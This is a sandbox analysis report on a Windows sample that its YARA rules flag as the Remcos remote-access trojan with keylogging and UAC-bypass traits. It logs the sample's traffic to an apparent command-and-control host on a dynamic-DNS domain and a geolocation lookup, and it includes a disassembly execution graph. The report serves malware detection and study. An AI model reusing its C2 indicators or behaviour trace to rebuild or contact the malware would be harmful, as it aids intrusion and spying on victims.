                                                        2025-01-10T07:50:18.965560+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.749706178.237.33.5080TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 10, 2025 07:50:16.951236963 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:16.956094980 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:16.956165075 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:16.961410999 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:16.966162920 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:17.593705893 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:17.643480062 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:17.723831892 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:17.727778912 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:17.733146906 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:17.733211994 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:17.738497972 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:18.049067974 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:18.050373077 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:18.055582047 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:18.185257912 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:18.237226963 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:18.340142965 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:50:18.344952106 CET8049706178.237.33.50192.168.2.7
                                                        Jan 10, 2025 07:50:18.345036030 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:50:18.345216036 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:50:18.350080013 CET8049706178.237.33.50192.168.2.7
                                                        Jan 10, 2025 07:50:18.965486050 CET8049706178.237.33.50192.168.2.7
                                                        Jan 10, 2025 07:50:18.965559959 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:50:18.987709045 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:18.992671013 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:19.965866089 CET8049706178.237.33.50192.168.2.7
                                                        Jan 10, 2025 07:50:19.970654011 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:50:20.010272980 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:20.012303114 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:20.017144918 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:50.055286884 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:50:50.056847095 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:50:50.061719894 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:51:20.170331955 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:51:20.172291040 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:51:20.177161932 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:51:50.260201931 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:51:50.262659073 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:51:50.267477989 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:52:08.315974951 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:52:08.722541094 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:52:09.331444979 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:52:10.534599066 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:52:13.034718990 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:52:18.035339117 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:52:20.369019032 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:52:20.370125055 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:52:20.374911070 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:52:27.722043037 CET4970680192.168.2.7178.237.33.50
                                                        Jan 10, 2025 07:52:50.473879099 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:52:50.475594044 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:52:50.480432034 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:53:20.588294983 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:53:20.589747906 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:53:20.594583988 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:53:50.643647909 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:53:50.645245075 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:53:50.650144100 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:54:20.778136015 CET199749704179.15.136.6192.168.2.7
                                                        Jan 10, 2025 07:54:20.838586092 CET497041997192.168.2.7179.15.136.6
                                                        Jan 10, 2025 07:54:20.843754053 CET199749704179.15.136.6192.168.2.7

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 10, 2025 07:50:16.779872894 CET5290753192.168.2.71.1.1.1
                                                        Jan 10, 2025 07:50:16.947993994 CET53529071.1.1.1192.168.2.7
                                                        Jan 10, 2025 07:50:18.329197884 CET5824553192.168.2.71.1.1.1
                                                        Jan 10, 2025 07:50:18.336433887 CET53582451.1.1.1192.168.2.7

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 10, 2025 07:50:16.779872894 CET192.168.2.71.1.1.10xead8Standard query (0)juanosorio.loseyourip.comA (IP address)IN (0x0001)false
                                                        Jan 10, 2025 07:50:18.329197884 CET192.168.2.71.1.1.10x6180Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 10, 2025 07:50:16.947993994 CET1.1.1.1192.168.2.70xead8No error (0)juanosorio.loseyourip.com179.15.136.6A (IP address)IN (0x0001)false
                                                        Jan 10, 2025 07:50:18.336433887 CET1.1.1.1192.168.2.70x6180No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • geoplugin.net

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.749706178.237.33.50807704C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 10, 2025 07:50:18.345216036 CET71OUTGET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
                                                        Jan 10, 2025 07:50:18.965486050 CET1171INHTTP/1.1 200 OK
                                                        date: Fri, 10 Jan 2025 06:50:18 GMT
                                                        server: Apache
                                                        content-length: 963
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        System Behavior

                                                        General

                                                        Target ID:1
                                                        Start time:01:50:16
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe"
                                                        Imagebase:0x400000
                                                        File size:493'568 bytes
                                                        MD5 hash:90BF80022402E68248981833DCFACDE0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:4.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:22.3%
                                                          Total number of Nodes:1351
                                                          Total number of Limit Nodes:62
                                                          execution_graph 46458 44eac6 46459 44ead1 46458->46459 46460 44eaf9 46459->46460 46461 44eaea 46459->46461 46462 44eb08 46460->46462 46480 455783 27 API calls 2 library calls 46460->46480 46479 445564 20 API calls _abort 46461->46479 46467 44bbce 46462->46467 46465 44eaef ___scrt_fastfail 46468 44bbe6 46467->46468 46469 44bbdb 46467->46469 46471 44bbee 46468->46471 46477 44bbf7 _strftime 46468->46477 46487 446d0f 21 API calls 3 library calls 46469->46487 46481 446cd5 46471->46481 46473 44bc21 RtlReAllocateHeap 46476 44bbe3 46473->46476 46473->46477 46474 44bbfc 46488 445564 20 API calls _abort 46474->46488 46476->46465 46477->46473 46477->46474 46489 442410 7 API calls 2 library calls 46477->46489 46479->46465 46480->46462 46482 446ce0 RtlFreeHeap 46481->46482 46483 446d09 __dosmaperr 46481->46483 46482->46483 46484 446cf5 46482->46484 46483->46476 46490 445564 20 API calls _abort 46484->46490 46486 446cfb GetLastError 46486->46483 46487->46476 46488->46476 46489->46477 46490->46486 46491 426061 46492 426076 46491->46492 46498 426116 46491->46498 46493 4261a9 46492->46493 46494 426130 46492->46494 46495 4260f9 46492->46495 46492->46498 46500 426165 46492->46500 46501 4260c4 46492->46501 46506 426182 46492->46506 46519 42455f 50 API calls ctype 46492->46519 46493->46498 46524 4257d2 28 API calls 46493->46524 46494->46498 46494->46500 46522 41f280 54 API calls 46494->46522 46495->46494 46495->46498 46521 42455f 50 API calls ctype 46495->46521 46500->46506 46523 424d86 21 API calls 46500->46523 46501->46495 46501->46498 46520 41f280 54 API calls 46501->46520 46506->46493 46506->46498 46507 425183 46506->46507 46508 4251a2 ___scrt_fastfail 46507->46508 46510 4251b1 46508->46510 46513 4251d6 46508->46513 46525 41e2a2 21 API calls 46508->46525 46510->46513 46518 4251b6 46510->46518 46526 41fcdf 47 API calls 46510->46526 46513->46493 46514 4251bf 46514->46513 46533 424390 21 API calls 2 library calls 46514->46533 46516 425259 46516->46513 46527 4321a4 46516->46527 46518->46513 46518->46514 46532 41d179 50 API calls 46518->46532 46519->46501 46520->46501 46521->46494 46522->46494 46523->46506 46524->46498 46525->46510 46526->46516 46528 4321b2 46527->46528 46529 4321ae 46527->46529 46534 43aa9c 46528->46534 46529->46518 46532->46514 46533->46513 46539 446d0f _strftime 46534->46539 46535 446d4d 46542 445564 20 API calls _abort 46535->46542 46537 446d38 RtlAllocateHeap 46538 4321b7 46537->46538 46537->46539 46538->46518 46539->46535 46539->46537 46541 442410 7 API calls 2 library calls 46539->46541 46541->46539 46542->46538 46543 42623b 46548 426302 recv 46543->46548 46549 41d6db 46551 41d6f1 ctype ___scrt_fastfail 46549->46551 46550 41d8ee 46555 41d93f 46550->46555 46565 41d27c DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46550->46565 46551->46550 46553 4321a4 21 API calls 46551->46553 46558 41d8a1 ___scrt_fastfail 46553->46558 46554 41d8ff 46554->46555 46556 41d96b 46554->46556 46557 4321a4 21 API calls 46554->46557 46556->46555 46569 41d67f 21 API calls ___scrt_fastfail 46556->46569 46561 41d938 ___scrt_fastfail 46557->46561 46558->46555 46559 4321a4 21 API calls 46558->46559 46563 41d8c9 ___scrt_fastfail 46559->46563 46561->46555 46566 43285a 46561->46566 46563->46555 46564 4321a4 21 API calls 46563->46564 46564->46550 46565->46554 46570 43277a 46566->46570 46568 432862 46568->46556 46569->46555 46571 432789 46570->46571 46572 432793 46570->46572 46571->46568 46572->46571 46573 4321a4 21 API calls 46572->46573 46574 4327b4 46573->46574 46574->46571 46576 432b45 CryptAcquireContextA 46574->46576 46577 432b61 46576->46577 46578 432b66 CryptGenRandom 46576->46578 46577->46571 46578->46577 46579 432b7b CryptReleaseContext 46578->46579 46579->46577 46580 433bc9 46581 433bd5 ___BuildCatchObject 46580->46581 46612 4338be 46581->46612 46583 433bdc 46584 433d2f 46583->46584 46587 433c06 46583->46587 46914 433d4f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46584->46914 46586 433d36 46915 4428ce 28 API calls _abort 46586->46915 46599 433c45 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46587->46599 46908 4436e1 5 API calls ___crtLCMapStringA 46587->46908 46589 433d3c 46916 442880 28 API calls _abort 46589->46916 46592 433c1f 46594 433c25 46592->46594 46909 443685 5 API calls ___crtLCMapStringA 46592->46909 46593 433d44 46596 433ca6 46623 433e69 46596->46623 46599->46596 46910 43f037 38 API calls 2 library calls 46599->46910 46606 433cc8 46606->46586 46607 433ccc 46606->46607 46608 433cd5 46607->46608 46912 442871 28 API calls _abort 46607->46912 46913 433a4d 13 API calls 2 library calls 46608->46913 46611 433cdd 46611->46594 46613 4338c7 46612->46613 46917 434015 IsProcessorFeaturePresent 46613->46917 46615 4338d3 46918 437bfe 10 API calls 3 library calls 46615->46918 46617 4338d8 46622 4338dc 46617->46622 46919 44356e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46617->46919 46619 4338f3 46619->46583 46620 4338e5 46620->46619 46920 437c27 8 API calls 3 library calls 46620->46920 46622->46583 46921 436260 46623->46921 46626 433cac 46627 443632 46626->46627 46923 44dfd9 46627->46923 46629 433cb5 46632 40d83a 46629->46632 46630 44363b 46630->46629 46927 44e2e3 38 API calls 46630->46927 46929 41beee LoadLibraryA GetProcAddress 46632->46929 46634 40d856 GetModuleFileNameW 46934 40e240 46634->46934 46636 40d872 46949 401fbd 46636->46949 46639 401fbd 28 API calls 46640 40d890 46639->46640 46953 41b1ce 46640->46953 46644 40d8a2 46978 401d8c 46644->46978 46646 40d8ab 46647 40d908 46646->46647 46648 40d8be 46646->46648 46984 401d64 46647->46984 47258 40ea5e 111 API calls 46648->47258 46651 40d918 46654 401d64 28 API calls 46651->46654 46652 40d8d0 46653 401d64 28 API calls 46652->46653 46657 40d8dc 46653->46657 46655 40d937 46654->46655 46989 404cbf 46655->46989 47259 40ea0f 68 API calls 46657->47259 46658 40d946 46993 405ce6 46658->46993 46661 40d952 46996 401eef 46661->46996 46662 40d8f7 47260 40e22d 68 API calls 46662->47260 46665 40d95e 47000 401eea 46665->47000 46667 40d967 46669 401eea 26 API calls 46667->46669 46668 401eea 26 API calls 46670 40dd72 46668->46670 46671 40d970 46669->46671 46911 433e9f GetModuleHandleW 46670->46911 46672 401d64 28 API calls 46671->46672 46673 40d979 46672->46673 47004 401ebd 46673->47004 46675 40d984 46676 401d64 28 API calls 46675->46676 46677 40d99d 46676->46677 46678 401d64 28 API calls 46677->46678 46679 40d9b8 46678->46679 46680 40da19 46679->46680 47261 4085b4 46679->47261 46681 401d64 28 API calls 46680->46681 46697 40e20c 46680->46697 46687 40da30 46681->46687 46683 40d9e5 46684 401eef 26 API calls 46683->46684 46685 40d9f1 46684->46685 46686 401eea 26 API calls 46685->46686 46689 40d9fa 46686->46689 46688 40da77 46687->46688 46692 41258f 3 API calls 46687->46692 47008 40bed7 46688->47008 47265 41258f RegOpenKeyExA 46689->47265 46691 40da7d 46693 40d900 46691->46693 47011 41a66e 46691->47011 46698 40da5b 46692->46698 46693->46668 46696 40da98 46699 40daeb 46696->46699 47028 40697b 46696->47028 47343 4129da 30 API calls 46697->47343 46698->46688 47268 4129da 30 API calls 46698->47268 46701 401d64 28 API calls 46699->46701 46704 40daf4 46701->46704 46713 40db00 46704->46713 46714 40db05 46704->46714 46706 40e222 47344 41138d 64 API calls ___scrt_fastfail 46706->47344 46707 40dac1 46711 401d64 28 API calls 46707->46711 46708 40dab7 47269 40699d 30 API calls 46708->47269 46720 40daca 46711->46720 47272 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46713->47272 46718 401d64 28 API calls 46714->46718 46715 40dabc 47270 4064d0 97 API calls 46715->47270 46719 40db0e 46718->46719 47032 41b013 46719->47032 46720->46699 46724 40dae6 46720->46724 46722 40db19 47036 401e18 46722->47036 47271 4064d0 97 API calls 46724->47271 46725 40db24 47040 401e13 46725->47040 46728 40db2d 46729 401d64 28 API calls 46728->46729 46730 40db36 46729->46730 46731 401d64 28 API calls 46730->46731 46732 40db50 46731->46732 46733 401d64 28 API calls 46732->46733 46734 40db6a 46733->46734 46735 401d64 28 API calls 46734->46735 46736 40db83 46735->46736 46737 401d64 28 API calls 46736->46737 46768 40dbf0 46736->46768 46743 40db98 _wcslen 46737->46743 46738 40dbff 46739 40dc08 46738->46739 46765 40dc84 ___scrt_fastfail 46738->46765 46740 401d64 28 API calls 46739->46740 46742 40dc11 46740->46742 46741 40dd7d ___scrt_fastfail 47332 412735 RegOpenKeyExA 46741->47332 46744 401d64 28 API calls 46742->46744 46745 401d64 28 API calls 46743->46745 46743->46768 46746 40dc23 46744->46746 46747 40dbb3 46745->46747 46749 401d64 28 API calls 46746->46749 46750 401d64 28 API calls 46747->46750 46751 40dc35 46749->46751 46752 40dbc8 46750->46752 46754 401d64 28 API calls 46751->46754 47273 40c89e 46752->47273 46753 40ddc2 46755 401d64 28 API calls 46753->46755 46757 40dc5e 46754->46757 46758 40dde9 46755->46758 46763 401d64 28 API calls 46757->46763 47054 401f66 46758->47054 46760 401e18 26 API calls 46762 40dbe7 46760->46762 46766 401e13 26 API calls 46762->46766 46767 40dc6f 46763->46767 46764 40ddf8 47058 4127aa RegCreateKeyA 46764->47058 47044 41297a 46765->47044 46766->46768 47330 40bc67 46 API calls _wcslen 46767->47330 46768->46738 46768->46741 46772 40dc7f 46772->46765 46774 40dd18 46777 401d64 28 API calls 46774->46777 46775 401d64 28 API calls 46776 40de1a 46775->46776 47064 43a7f7 46776->47064 46778 40dd2f 46777->46778 46778->46753 46781 40dd43 46778->46781 46784 401d64 28 API calls 46781->46784 46782 40de31 47335 41c0bb 87 API calls ___scrt_fastfail 46782->47335 46783 40de54 46788 401f66 28 API calls 46783->46788 46786 40dd51 46784->46786 46789 41b013 28 API calls 46786->46789 46787 40de38 CreateThread 46787->46783 48090 41cb7a 10 API calls 46787->48090 46790 40de69 46788->46790 46791 40dd5a 46789->46791 46792 401f66 28 API calls 46790->46792 47331 40e2f1 112 API calls 46791->47331 46794 40de78 46792->46794 47068 41a891 46794->47068 46795 40dd5f 46795->46753 46797 40dd66 46795->46797 46797->46693 46799 401d64 28 API calls 46800 40de89 46799->46800 46801 401d64 28 API calls 46800->46801 46802 40de9e 46801->46802 46803 401d64 28 API calls 46802->46803 46804 40debe 46803->46804 46805 43a7f7 _strftime 42 API calls 46804->46805 46806 40decb 46805->46806 46807 401d64 28 API calls 46806->46807 46808 40ded6 46807->46808 46809 401d64 28 API calls 46808->46809 46810 40dee7 46809->46810 46811 401d64 28 API calls 46810->46811 46812 40defc 46811->46812 46813 401d64 28 API calls 46812->46813 46814 40df0d 46813->46814 46815 40df14 StrToIntA 46814->46815 47092 409517 46815->47092 46818 401d64 28 API calls 46819 40df2f 46818->46819 46820 40df74 46819->46820 46821 40df3b 46819->46821 46824 401d64 28 API calls 46820->46824 47336 433818 22 API calls 3 library calls 46821->47336 46823 40df44 46825 401d64 28 API calls 46823->46825 46826 40df84 46824->46826 46827 40df57 46825->46827 46829 40df90 46826->46829 46830 40dfcc 46826->46830 46828 40df5e CreateThread 46827->46828 46828->46820 48094 41931e 109 API calls 2 library calls 46828->48094 47337 433818 22 API calls 3 library calls 46829->47337 46831 401d64 28 API calls 46830->46831 46833 40dfd5 46831->46833 46837 40dfe1 46833->46837 46838 40e03f 46833->46838 46834 40df99 46835 401d64 28 API calls 46834->46835 46836 40dfab 46835->46836 46839 40dfb2 CreateThread 46836->46839 46841 401d64 28 API calls 46837->46841 46840 401d64 28 API calls 46838->46840 46839->46830 48093 41931e 109 API calls 2 library calls 46839->48093 46842 40e048 46840->46842 46843 40dff1 46841->46843 46844 40e054 46842->46844 46845 40e08d 46842->46845 46846 401d64 28 API calls 46843->46846 46848 401d64 28 API calls 46844->46848 47117 41a9ad GetComputerNameExW GetUserNameW 46845->47117 46849 40e006 46846->46849 46851 40e05d 46848->46851 47338 40c854 32 API calls 46849->47338 46855 401d64 28 API calls 46851->46855 46852 401e18 26 API calls 46854 40e0a1 46852->46854 46857 401e13 26 API calls 46854->46857 46858 40e072 46855->46858 46856 40e019 46859 401e18 26 API calls 46856->46859 46860 40e0aa 46857->46860 46869 43a7f7 _strftime 42 API calls 46858->46869 46863 40e025 46859->46863 46861 40e0b3 SetProcessDEPPolicy 46860->46861 46862 40e0b6 CreateThread 46860->46862 46861->46862 46864 40e0d7 46862->46864 46865 40e0cb CreateThread 46862->46865 48062 40e627 46862->48062 46866 401e13 26 API calls 46863->46866 46867 40e0e0 CreateThread 46864->46867 46868 40e0ec 46864->46868 46865->46864 48089 41100e 138 API calls 46865->48089 46870 40e02e CreateThread 46866->46870 46867->46868 48091 4115fc 38 API calls ___scrt_fastfail 46867->48091 46872 40e146 46868->46872 46874 401f66 28 API calls 46868->46874 46871 40e07f 46869->46871 46870->46838 48092 40196b 49 API calls _strftime 46870->48092 47339 40b95c 7 API calls 46871->47339 47128 412546 RegOpenKeyExA 46872->47128 46875 40e119 46874->46875 47340 404c9e 28 API calls 46875->47340 46879 40e126 46881 401f66 28 API calls 46879->46881 46880 40e1fd 47140 40cbac 46880->47140 46884 40e135 46881->46884 46883 41b013 28 API calls 46887 40e177 46883->46887 46885 41a891 79 API calls 46884->46885 46888 40e13a 46885->46888 47131 41265c RegOpenKeyExW 46887->47131 46890 401eea 26 API calls 46888->46890 46890->46872 46895 401e13 26 API calls 46898 40e198 46895->46898 46896 40e1c0 DeleteFileW 46897 40e1c7 46896->46897 46896->46898 46900 41b013 28 API calls 46897->46900 46898->46896 46898->46897 46899 40e1ae Sleep 46898->46899 47341 401e07 46899->47341 46902 40e1d7 46900->46902 47136 412a52 RegOpenKeyExW 46902->47136 46904 40e1ea 46905 401e13 26 API calls 46904->46905 46906 40e1f4 46905->46906 46907 401e13 26 API calls 46906->46907 46907->46880 46908->46592 46909->46599 46910->46596 46911->46606 46912->46608 46913->46611 46914->46586 46915->46589 46916->46593 46917->46615 46918->46617 46919->46620 46920->46622 46922 433e7c GetStartupInfoW 46921->46922 46922->46626 46924 44dfeb 46923->46924 46925 44dfe2 46923->46925 46924->46630 46928 44ded8 51 API calls 5 library calls 46925->46928 46927->46630 46928->46924 46930 41bf2d LoadLibraryA GetProcAddress 46929->46930 46931 41bf1d GetModuleHandleA GetProcAddress 46929->46931 46932 41bf56 32 API calls 46930->46932 46933 41bf46 LoadLibraryA GetProcAddress 46930->46933 46931->46930 46932->46634 46933->46932 47345 41a84a FindResourceA 46934->47345 46937 43aa9c ___crtLCMapStringA 21 API calls 46938 40e26a ctype 46937->46938 47348 401f86 46938->47348 46941 401eef 26 API calls 46942 40e290 46941->46942 46943 401eea 26 API calls 46942->46943 46944 40e299 46943->46944 46945 43aa9c ___crtLCMapStringA 21 API calls 46944->46945 46946 40e2aa ctype 46945->46946 47352 406052 46946->47352 46948 40e2dd 46948->46636 46950 401fcc 46949->46950 47360 402501 46950->47360 46952 401fea 46952->46639 46954 41b1e1 46953->46954 46958 41b253 46954->46958 46966 401eef 26 API calls 46954->46966 46969 401eea 26 API calls 46954->46969 46973 41b251 46954->46973 47365 403b60 46954->47365 47368 41c1b4 28 API calls 46954->47368 46955 401eea 26 API calls 46956 41b283 46955->46956 46957 401eea 26 API calls 46956->46957 46959 41b28b 46957->46959 46960 403b60 28 API calls 46958->46960 46962 401eea 26 API calls 46959->46962 46963 41b25f 46960->46963 46964 40d899 46962->46964 46965 401eef 26 API calls 46963->46965 46974 40e995 46964->46974 46967 41b268 46965->46967 46966->46954 46968 401eea 26 API calls 46967->46968 46970 41b270 46968->46970 46969->46954 47369 41c1b4 28 API calls 46970->47369 46973->46955 46975 40e9a2 46974->46975 46977 40e9b2 46975->46977 47386 40200a 26 API calls 46975->47386 46977->46644 46979 40200a 46978->46979 46983 40203a 46979->46983 47387 402654 26 API calls 46979->47387 46981 40202b 47388 4026ba 26 API calls _Deallocate 46981->47388 46983->46646 46985 401d6c 46984->46985 46987 401d74 46985->46987 47389 401fff 28 API calls 46985->47389 46987->46651 46990 404ccb 46989->46990 47390 402e78 46990->47390 46992 404cee 46992->46658 47399 404bc4 